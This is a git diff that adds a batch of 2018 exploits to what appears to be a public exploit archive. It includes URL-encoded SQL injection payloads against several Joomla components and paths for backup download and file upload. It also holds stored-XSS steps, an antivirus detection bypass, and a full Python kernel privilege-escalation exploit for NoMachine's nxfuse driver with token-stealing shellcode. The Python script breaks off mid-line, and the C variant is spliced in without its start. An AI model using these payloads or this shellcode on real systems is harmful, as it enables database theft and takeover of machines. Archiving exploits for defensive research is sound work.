+http://creativecommons.org/licenses/by-nc-sa/3.0/us/ + +13. *PGP/GPG Keys* + +This advisory has been signed with the GPG key of Core Security advisories +team, which is available for download at +http://www.coresecurity.com/files/attachments/core_security_advisories.asc. \ No newline at end of file diff --git a/exploits/php/webapps/44158.txt b/exploits/php/webapps/44158.txt new file mode 100644 index 000000000..a4130b145 --- /dev/null +++ b/exploits/php/webapps/44158.txt @@ -0,0 +1,24 @@ +# # # # +# Exploit Title: Joomla! Component CW Tags 2.0.6 - SQL Injection +# Dork: N/A +# Date: 22.02.2018 +# Vendor Homepage: http://www.cwjoomla.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/search-a-indexing/tags-a-clouds/cw-tags/ +# Version: 2.0.6 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-7313 +# # # # +# Exploit Author: Ihsan Sencan +# # # # +# +# POC: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_cwtags&searchtext[]=[SQL] +# +# %2d%45%66%65%27%29%20%20%2f%2a%21%30%33%33%33%33%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%33%33%33%33%53%45%4c%45%43%54%2a%2f%20%40%40%48%4f%53%54%4e%41%4d%45%2d%2d%20%2d +# +# %31%27%61%6e%64%20%28%73%65%6c%65%63%74%20%31%20%66%72%6f%6d%20%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%63%61%73%74%28%64%61%74%61%62%61%73%65%28%29%20%61%73%20%63%68%61%72%29%2c%30%78%37%65%29%29%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%77%68%65%72%65%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%64%61%74%61%62%61%73%65%28%29%20%6c%69%6d%69%74%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%67%72%6f%75%70%20%62%79%20%78%29%61%29%20%41%4e%44%20%27%27%3d%27 +# +# # # # \ No newline at end of file diff --git a/exploits/php/webapps/44159.txt b/exploits/php/webapps/44159.txt new file mode 100644 index 000000000..efce187c8 --- /dev/null +++ b/exploits/php/webapps/44159.txt @@ -0,0 +1,23 @@ +# # # # +# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download +# Dork: N/A +# Date: 22.02.2018 +# Vendor Homepage: https://www.christianwebministries.org/ +# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/ +# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip +# Version: 9.1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-7317 +# # # # +# Exploit Author: Ihsan Sencan +# # # # +# +# POC: +# +# 1) +# http://localhost/[PATH]/media/com_biblestudy/backup/ +# +# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql +# +# # # # \ No newline at end of file diff --git a/exploits/php/webapps/44160.txt b/exploits/php/webapps/44160.txt new file mode 100644 index 000000000..fab47ce3c --- /dev/null +++ b/exploits/php/webapps/44160.txt @@ -0,0 +1,24 @@ +# # # # +# Exploit Title: Joomla! Component PrayerCenter 3.0.2 - SQL Injection +# Dork: N/A +# Date: 22.02.2018 +# Vendor Homepage: http://www.mlwebtechnologies.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/prayercenter/ +# Software Download: http://mlwebtechnologies.github.io/PrayerCenter/ +# Software Download: https://github.com/MLWebTechnologies/PrayerCenter/releases/download/3.0.2/PrayerCenter302Unzip1st.zip +# Version: 3.0.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-7314 +# # # # +# Exploit Author: Ihsan Sencan +# # # # +# +# POC: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=[SQL] +# +# %31%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69 +# +# # # # \ No newline at end of file diff --git a/exploits/php/webapps/44161.txt b/exploits/php/webapps/44161.txt new file mode 100644 index 000000000..83fb4ede2 --- /dev/null +++ b/exploits/php/webapps/44161.txt @@ -0,0 +1,29 @@ +# # # # +# Exploit Title: Joomla! Component Ek Rishta 2.9 - SQL Injection +# Dork: N/A +# Date: 22.02.2018 +# Vendor Homepage: https://www.joomlaextensions.co.in/ +# Software Link: https://extensions.joomla.org/extensions/extension/living/dating-a-relationships/ek-rishta/ +# Version: 2.9 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-7315 +# # # # +# Exploit Author: Ihsan Sencan +# # # # +# +# POC: +# +# 1) +# http://localhost/[PATH]/index.php/component/ekrishta/alluser?options=com_ekrishta&view=alluser +# &gender=[SQL] +# &age1=[SQL] +# &age2=[SQL] +# &religion=[SQL] +# &mothertounge=[SQL] +# &caste=[SQL] +# &country=[SQL] +# +# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69 +# +# # # # \ No newline at end of file diff --git a/exploits/php/webapps/44162.txt b/exploits/php/webapps/44162.txt new file mode 100644 index 000000000..c74d14c43 --- /dev/null +++ b/exploits/php/webapps/44162.txt @@ -0,0 +1,23 @@ +# # # # +# Exploit Title: Joomla! Component Alexandria Book Library 3.1.2 - SQL Injection +# Dork: N/A +# Date: 22.02.2018 +# Vendor Homepage: https://alexandriabooklibrary.org/ +# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/alexandria-book-library/ +# Software Download: https://alexandriabooklibrary.org/abook_files/Alexandria_Book_Library/Alexandria_Book_Library_for_Joomla_30/Component/com_abook_3_1_2_beta.tgz +# Version: 3.1.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-7312 +# # # # +# Exploit Author: Ihsan Sencan +# # # # +# +# POC: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_abook&view=category&letter=[SQL] +# +# %44%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69 +# +# # # # \ No newline at end of file diff --git a/exploits/php/webapps/44163.txt b/exploits/php/webapps/44163.txt new file mode 100644 index 000000000..307d78fda --- /dev/null +++ b/exploits/php/webapps/44163.txt @@ -0,0 +1,27 @@ +# # # # +# Exploit Title: Joomla! Component CheckList 1.1.1 - SQL Injection +# Dork: N/A +# Date: 22.02.2018 +# Vendor Homepage: https://www.joomplace.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/living/personal-life/checklist/ +# Version: 1.1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-7318 +# # # # +# Exploit Author: Ihsan Sencan +# # # # +# +# POC: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_checklist&view=frontend +# &title_search=[SQL] +# &tag_search=[SQL] +# &name_search=[SQL] +# &description_search=[SQL] +# &filter_order=[SQL] +# +# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69 +# +# # # # \ No newline at end of file diff --git a/exploits/php/webapps/44164.txt b/exploits/php/webapps/44164.txt new file mode 100644 index 000000000..468a5b097 --- /dev/null +++ b/exploits/php/webapps/44164.txt @@ -0,0 +1,23 @@ +# # # # +# Exploit Title: Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload +# Dork: N/A +# Date: 22.02.2018 +# Vendor Homepage: https://www.christianwebministries.org/ +# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/ +# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip +# Version: 9.1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-7316 +# # # # +# Exploit Author: Ihsan Sencan +# # # # +# +# POC: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 +# +# http://localhost/[PATH]/images/biblestudy/media/[FILE] +# +# # # # \ No newline at end of file diff --git a/exploits/php/webapps/44165.txt b/exploits/php/webapps/44165.txt new file mode 100644 index 000000000..f7df14d68 --- /dev/null +++ b/exploits/php/webapps/44165.txt @@ -0,0 +1,23 @@ +# # # # +# Exploit Title: Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection +# Dork: N/A +# Date: 22.02.2018 +# Vendor Homepage: https://www.joomdonation.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property/ +# Version: 3.12.7 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-7319 +# # # # +# Exploit Author: Ihsan Sencan +# # # # +# +# POC: +# +# 1) +# http://localhost/[PATH]/os-property-layouts/search-tools/advanced-search?&option=com_osproperty&task=property_advsearch +# &cooling_system1=[SQL] +# &heating_system1=[SQL] +# &laundry=[SQL] +# +# # # # \ No newline at end of file diff --git a/exploits/php/webapps/44170.txt b/exploits/php/webapps/44170.txt new file mode 100644 index 000000000..52e1240f7 --- /dev/null +++ b/exploits/php/webapps/44170.txt @@ -0,0 +1,19 @@ +####################################################### +# Exploit Title: Learning and Examination Management System Script 2.3.1 – Stored XSS +# Date: 09.02.2018 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/learning-examination-management-system/ +# Category: Web Application +# Exploit Author: Prasenjit Kanti Paul +# Web: http://hack2rule.wordpress.com/ +# Version: 2.3.1 +# Tested on: Linux Mint +# CVE: CVE-2018-6866 +####################################################### + +Proof of Concept +----------------- +1. Login into the site +2. Goto “Message” options +3. Put as message / reply message +4. You will be having a popup “PKP” \ No newline at end of file diff --git a/exploits/php/webapps/44171.txt b/exploits/php/webapps/44171.txt new file mode 100644 index 000000000..93c2bf635 --- /dev/null +++ b/exploits/php/webapps/44171.txt @@ -0,0 +1,19 @@ +####################################################### +# Exploit Title: Alibaba Clone Script 1.0.2 – Stored XSS +# Date: 09.02.2018 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/alibaba-clone/ +# Category: Web Application +# Exploit Author: Prasenjit Kanti Paul +# Web: http://hack2rule.wordpress.com/ +# Version: 1.0.2 +# Tested on: Linux Mint +# CVE: CVE-2018-6867 +####################################################### + +Proof of Concept +----------------- +1. Login into the site +2. Goto “Edit Profile” +3. Put in any field +4. You will be having a popup “PKP” \ No newline at end of file diff --git a/exploits/php/webapps/44172.txt b/exploits/php/webapps/44172.txt new file mode 100644 index 000000000..d4f4fead5 --- /dev/null +++ b/exploits/php/webapps/44172.txt @@ -0,0 +1,19 @@ +######################################################################## +# Exploit Title: Slickdeals/DealNews/Groupon Clone Script 3.0.2 – Stored XSS +# Date: 09.02.2018 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/groupon-clone-script/ +# Category: Web Application +# Exploit Author: Prasenjit Kanti Paul +# Web: http://hack2rule.wordpress.com/ +# Version: 3.0.2 +# Tested on: Linux Mint +# CVE: CVE-2018-6868 +########################################################################## + +Proof of Concept +------------------------ +1. Login into the site +2. Goto “Edit Profile” +3. Put in any field +4. You will be having a popup “PKP” \ No newline at end of file diff --git a/exploits/windows/local/44169.txt b/exploits/windows/local/44169.txt new file mode 100644 index 000000000..cd044cd9b --- /dev/null +++ b/exploits/windows/local/44169.txt @@ -0,0 +1,49 @@ +/* +Title: Armadito Antivirus - Malware Detection Bypass +Date: 21/02/2018 +Author: Souhail Hammou +Author's website: http://rce4fun.blogspot.com +Vendor Homepage: http://www.teclib-edition.com/en/ +Version: 0.12.7.2 +CVE: CVE-2018-7289 + + +Details: +-------- +An issue was discovered in armadito-windows-driver/src/communication.c affecting Armadito 0.12.7.2 and previous versions. +Malware with filenames containing pure UTF-16 characters can bypass detection. +The user-mode service will fail to open the file for scanning after the conversion is done from Unicode to ANSI. +This happens because characters that cannot be converted from Unicode are replaced with the '?' character. + +The code responsible for this issue is located in armadito-windows-driver/src/communication.c + +======================================================================================================== + // Convert unicode string to ansi string for ring 3 process. + ntStatus = RtlUnicodeStringToAnsiString(&AnsiString, (PCUNICODE_STRING)FilePath, TRUE); + if(!NT_SUCCESS(ntStatus)){ + DbgPrint("[-] Error :: ArmaditoGuard!SendScanOrder :: RtlUnicodeStringToAnsiString() routine failed !! \n"); + __leave; + } +======================================================================================================== + +The two examples below demonstrate the bug. +In the first case, the filename is in Arabic and in the second, the filename's first letter is the greek M (U+039C). + + +Original filename: + مرحبا.exe : 0645 0631 062d 0628 0627 002e 0065 0078 0065 + +Converted to ANSI by Armadito: + ?????.exe : 3f 3f 3f 3f 3f 2e 65 78 65 + +============================= + +Original filename: + Μalware.exe : 039c 0061 006c 0077 0061 0072 0065 002e 0065 0078 0065 + +Converted to ANSI by Armadito: + ?alware.exe : 3f 61 6c 77 61 72 65 2e 65 78 65 + + +See: https://github.com/armadito/armadito-windows-driver/issues/5 +*/ \ No newline at end of file diff --git a/exploits/windows_x86-64/local/44168.py b/exploits/windows_x86-64/local/44168.py new file mode 100755 index 000000000..a47cb11ce --- /dev/null +++ b/exploits/windows_x86-64/local/44168.py @@ -0,0 +1,451 @@ +from ctypes import * + +from ctypes.wintypes import * + +import struct + +import sys + +import os + + + +MEM_COMMIT = 0x00001000 + +MEM_RESERVE = 0x00002000 + +PAGE_EXECUTE_READWRITE = 0x00000040 + +GENERIC_READ = 0x80000000 + +GENERIC_WRITE = 0x40000000 + +OPEN_EXISTING = 0x3 + +STATUS_INVALID_HANDLE = 0xC0000008 + + + +shellcode_len = 90 + +s = “” + +s += “\x65\x48\x8B\x04\x25\x88\x01\x00” #mov rax, [gs:0x188] + +s += “\x00” + +s += “\x48\x8B\x40\x70” #mov rax, [rax + 0x70] + +s += “\x48\x8B\x98\x90\x02\x00\x00” #mov rbx, [rax + 0x290] + +s += “\x48\x8B\x80\x88\x01\x00\x00” #mov rax, [rax + 0x188] + +s += “\x48\x2D\x88\x01\x00\x00” #sub rax, 0x188 + +s += “\x48\x39\x98\x80\x01\x00\x00” #cmp [rax + 0x180], rbx + +s += “\x75\xEA” #jne Loop1 + +s += “\x48\x89\xC1” #mov rcx, rax + +s += “\xBA\x04\x00\x00\x00” #mov rdx, 0x4 + +s += “\x48\x8B\x80\x88\x01\x00\x00” #mov rax, [rax + 0x188] + +s += “\x48\x2D\x88\x01\x00\x00” #sub rax, 0x188 + +s += “\x48\x39\x90\x80\x01\x00\x00” #cmp [rax + 0x180], rdx + +s += “\x75\xEA” #jne Loop2 + +s += “\x48\x8B\x80\x08\x02\x00\x00” #mov rax, [rax + 0x208] + +s += “\x48\x89\x81\x08\x02\x00\x00” #mov [rcx + 0x208], rax + +s += “\x48\x31\xC0” #xor rax,rax + +s += “\xc3” #ret + +shellcode = s + + + + + +”’ + +* Convert a python string to PCHAR + +@Param string – the string to be converted. + +@Return – a PCHAR that can be used by winapi functions. + +”’ + +def str_to_pchar(string): + + pString = c_char_p(string) + + + + return pString + + + +”’ + +* Map memory in userspace using NtAllocateVirtualMemory + +@Param address – The address to be mapped, such as 0x41414141. + +@Param size – the size of the mapping. + +@Return – a tuple containing the base address of the mapping and the size returned. + +”’ + +def map_memory(address, size): + + temp_address = c_void_p(address) + + size = c_uint(size) + + + + proc = windll.kernel32.GetCurrentProcess() + + nt_status = windll.ntdll.NtAllocateVirtualMemory(c_void_p(proc), + + byref(temp_address), 0, + + byref(size), + + MEM_RESERVE|MEM_COMMIT, + + PAGE_EXECUTE_READWRITE) + + + + #The mapping failed, let the calling code know + + if nt_status != 0: + + return (-1, c_ulong(nt_status).value) + + else: + + return (temp_address, size) + + + +”’ + +* Write to some mapped memory. + +@Param address – The address in memory to write to. + +@Param size – The size of the write. + +@Param buffer – A python buffer that holds the contents to write. + +@Return – the number of bytes written. + +”’ + +def write_memory(address, size, buffer): + + temp_address = c_void_p(address) + + temp_buffer = str_to_pchar(buffer) + + proc = c_void_p(windll.kernel32.GetCurrentProcess()) + + bytes_ret = c_ulong() + + size = c_uint(size) + + + + windll.kernel32.WriteProcessMemory(proc, + + temp_address, + + temp_buffer, + + size, + + byref(bytes_ret)) + + + + return bytes_ret + + + +”’ + +* Get a handle to a device by its name. The calling code is responsible for + +* checking the handle is valid. + +@Param device_name – a string representing the name, ie \\\\.\\nxfs-net…. + +”’ + +def get_handle(device_name): + + return windll.kernel32.CreateFileA(device_name, + + GENERIC_READ | GENERIC_WRITE, + + 0, + + None, + + OPEN_EXISTING, + + 0, + + None) + + + +def main(): + + print “[+] Attempting to exploit uninitialised stack variable, this has a chance of causing a bsod!” + + + + print “[+] Mapping the regions of memory we require” + + + + #Try and map the first 3 critical regions, if any of them fail we exit. + + address_1, size_1 = map_memory(0x14c00000, 0x1f0000) + + if address_1 == -1: + + print “[x] Mapping 0x610000 failed with error %x” %size_1 + + sys.exit(-1) + + + + address_2, size_2 = map_memory(0x41414141, 0x100000) + + if address_2 == -1: + + print “[x] Mapping 0x41414141 failed with error %x” %size_2 + + sys.exit(-1) + + + + address_3, size_3 = map_memory(0xbad0b0b0, 0x1000) + + if address_3 == -1: + + print “[x] Mapping 0xbad0b0b0 failed with error %x” %size_3 + + sys.exit(-1) + + + + #this will hold our shellcode + + sc_address, sc_size = map_memory(0x42424240, 0x1000) + + if sc_address == -1: + + print “[x] Mapping 0xbad0b0b0 failed with error %x” %sc_size + + sys.exit(-1) + + + + #Now we write certain values to those mapped memory regions + + print “[+] Writing data to mapped memory…” + + #the first write involves storing a pointer to our shellcode + + #at offset 0xbad0b0b0+0xa8 + + buff = “\x40BBB” #0x42424240 + + bytes_written = write_memory(0xbad0b0b0+0xa8, 4, buff) + + + + write_memory(0x42424240, shellcode_len, shellcode) + + + + #the second write involves spraying the first memory address with pointers + + #to our second mapped memory. + + print “\t spraying unitialised pointer memory with userland pointers” + + + + buff = “\x40AAA” #0x0000000041414140 + + for offset in range(4, size_1.value, 8): + + temp_address = address_1.value + offset + + write_memory(temp_address, 4, buff) + + + + #the third write simply involves setting 0x41414140-0x18 to 0x5 + + #this ensures the kernel creates a handle to a TOKEN object. + + print “[+] Setting TOKEN type index in our userland pointer” + + buff = “\x05” + + temp_address = 0x41414140-0x18 + + write_memory(temp_address, 1, buff) + + + + print “[+] Writing memory finished, getting handle to first device” + + handle = get_handle(“\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061”) + + + + if handle == STATUS_INVALID_HANDLE: + + print “[x] Couldn’t get handle to \\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061” + + sys.exit(-1) + + + + #if we have a valid handle, we now need to send ioctl 0x222014 + + #this creates a new device for which ioctl 0x222030 can be sent + + in_buff = struct.pack(“ + + + +#define DEVICE L”\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061″ + +#define DEVICE2 L”\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}” + +#define IOCTL 0x00222014 + +#define IOCTL2 0x00222030 + +#define OUT_SIZE 0x90 + +#define IN_SIZE 0x10 + + + +#define KTHREAD_OFFSET 0x124 + +#define EPROCESS_OFFSET 0x050 + +#define PID_OFFSET 0x0b4 + +#define FLINK_OFFSET 0x0b8 + +#define TOKEN_OFFSET 0x0f8 + +#define SYSTEM_PID 0x004 + +#define PARENT_PID 0x140 + + + +__declspec(naked)VOID TokenStealingShellcode() + +{ + + __asm{ + + xor eax, eax; + + mov eax, fs:[eax + KTHREAD_OFFSET]; + + mov eax, [eax + EPROCESS_OFFSET]; + + mov esi, [eax + PARENT_PID]; Get parent pid + + + + Loop1: + + mov eax, [eax + FLINK_OFFSET]; + + sub eax, FLINK_OFFSET; + + cmp esi, [eax + PID_OFFSET]; + + jne Loop1; + + + + mov ecx, eax; + + mov ebx, [eax + TOKEN_OFFSET]; + + mov edx, SYSTEM_PID; + + + + Search: + + mov eax, [eax + FLINK_OFFSET]; + + sub eax, FLINK_OFFSET; + + cmp[eax + PID_OFFSET], edx; + + jne Search; + + + + mov edx, [eax + TOKEN_OFFSET]; + + mov[ecx + TOKEN_OFFSET], edx; + + add esp, 0x58; + + add[esp], 5; + + ret 4; + + } + +} + + + +typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)( + + HANDLE ProcessHandle, + + PVOID *BaseAddress, + + ULONG ZeroBits, + + PULONG AllocationSize, + + ULONG AllocationType, + + ULONG Protect + + ); + + + +typedef NTSTATUS(WINAPI *PNtFreeVirtualMemory)( + + HANDLE ProcessHandle, + + PVOID *BaseAddress, + + PULONG RegionSize, + + ULONG FreeType + + ); + + + +int main() + +{ + + HMODULE module = LoadLibraryA(“ntdll.dll”); + + PNtAllocateVirtualMemory AllocMemory = (PNtAllocateVirtualMemory)GetProcAddress(module, “NtAllocateVirtualMemory”); + + PNtFreeVirtualMemory FreeMemory = (PNtFreeVirtualMemory)GetProcAddress(module, “NtFreeVirtualMemory”); + + + + SIZE_T size = 0x1000; + + PVOID address1 = (PVOID)0x05ffff00; + + + + + + NTSTATUS allocStatus = AllocMemory(GetCurrentProcess(), + + &address1, + + 0, + + &size, + + MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, + + PAGE_EXECUTE_READWRITE); + + + + if (allocStatus != 0) + + { + + printf(“[x]Couldnt alloc page\n”); + + exit(-1); + + } + + printf(“[+] Allocated address at %p\n”, address1); + + *(ULONG *)0x05fffff4 = 5; + + *(ULONG *)0x060000ac = 0x20; + + *(ULONG *)0x060001dc = 0x05ffff00; + + *(ULONG *)(0x05ffff00 – 0x18) = 1; + + *(ULONG *)(0x05ffff00 – 0x14) = 0; + + + + PVOID address2 = (PVOID)0x1; + + SIZE_T size2 = 0x1000; + + + + allocStatus = AllocMemory(GetCurrentProcess(), + + &address2, + + 0, + + &size2, + + MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, + + PAGE_EXECUTE_READWRITE); + + + + if (allocStatus != 0) + + { + + printf(“[x]Couldnt alloc page2\n”); + + exit(-1); + + } + + *(ULONG *)0x64 = (ULONG)&TokenStealingShellcode; + + printf(“[+] Mapped null page\n”); + + + + char inBuff[IN_SIZE]; + + char outBuff[OUT_SIZE]; + + + + HANDLE handle = 0; + + + + DWORD returned = 0; + + memset(inBuff, 0x41, IN_SIZE); + + memset(outBuff, 0x43, OUT_SIZE); + + + + *(ULONG *)inBuff = 0x00000190; + + *(ULONG *)(inBuff + 4) = 0x00000001; + + + + printf(“[+] Creating nxfs-net… device through IOCTL 222014\n”); + + handle = CreateFile(DEVICE, + + GENERIC_READ | GENERIC_WRITE, + + FILE_SHARE_READ | FILE_SHARE_WRITE, + + NULL, + + OPEN_EXISTING, + + FILE_ATTRIBUTE_NORMAL, + + 0); + + + + if (handle == INVALID_HANDLE_VALUE) + + { + + printf(“[x] Couldn’t open device\n”); + + exit(-1); + + } + + + + int ret = DeviceIoControl(handle, + + IOCTL, + + inBuff, + + IN_SIZE, + + outBuff, + + OUT_SIZE, + + &returned, + + 0); + + + + HANDLE handle2 = CreateFile(DEVICE2, + + GENERIC_READ | GENERIC_WRITE, + + FILE_SHARE_READ | FILE_SHARE_WRITE, + + NULL, + + OPEN_EXISTING, + + FILE_ATTRIBUTE_NORMAL, + + 0); + + + + char inBuff2[0x30]; + + char outBuff2[0x30]; + + + + printf(“[+] Triggering exploit…”); + + + + ret = DeviceIoControl(handle2, + + IOCTL2, + + inBuff2, + + 0x30, + + outBuff2, + + 0x30, + + &returned, + + 0); + + + + return 0; + +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index bbfe68da8..e26209efb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9532,6 +9532,9 @@ id,file,description,date,author,type,platform,port 44149,exploits/windows/local/44149.txt,"Microsoft Windows - Constrained Impersonation Capability Privilege Escalation",2018-02-20,"Google Security Research",local,windows, 44150,exploits/multiple/local/44150.rb,"MagniComp SysInfo - mcsiwrapper Privilege Escalation (Metasploit)",2018-02-20,Metasploit,local,multiple, 44152,exploits/windows/local/44152.txt,"Microsoft Windows - StorSvc SvcMoveFileInheritSecurity Arbitrary File Creation Privilege Escalation",2018-02-20,"Google Security Research",local,windows, +44167,exploits/windows_x86/local/44167.c,"NoMachine x86 < 6.0.80 - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86, +44168,exploits/windows_x86-64/local/44168.py,"NoMachine x64 < 6.0.80 - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86-64, +44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -38890,3 +38893,15 @@ id,file,description,date,author,type,platform,port 43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80 43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php, 43349,exploits/php/webapps/43349.txt,"Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php, +44158,exploits/php/webapps/44158.txt,"Joomla! Component CW Tags 2.0.6 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php, +44159,exploits/php/webapps/44159.txt,"Joomla! Component Proclaim 9.1.1 - Backup File Download",2018-02-22,"Ihsan Sencan",webapps,php, +44160,exploits/php/webapps/44160.txt,"Joomla! Component PrayerCenter 3.0.2 - 'sessionid' SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php, +44161,exploits/php/webapps/44161.txt,"Joomla! Component Ek Rishta 2.9 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php, +44162,exploits/php/webapps/44162.txt,"Joomla! Component Alexandria Book Library 3.1.2 - 'letter' SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php, +44163,exploits/php/webapps/44163.txt,"Joomla! Component CheckList 1.1.1 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php, +44164,exploits/php/webapps/44164.txt,"Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload",2018-02-22,"Ihsan Sencan",webapps,php, +44165,exploits/php/webapps/44165.txt,"Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php, +44166,exploits/jsp/webapps/44166.txt,"Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities",2018-02-22,"Core Security",webapps,jsp, +44170,exploits/php/webapps/44170.txt,"Learning and Examination Management System - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php, +44171,exploits/php/webapps/44171.txt,"Alibaba Clone Script 1.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php, +44172,exploits/php/webapps/44172.txt,"Groupon Clone Script 3.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,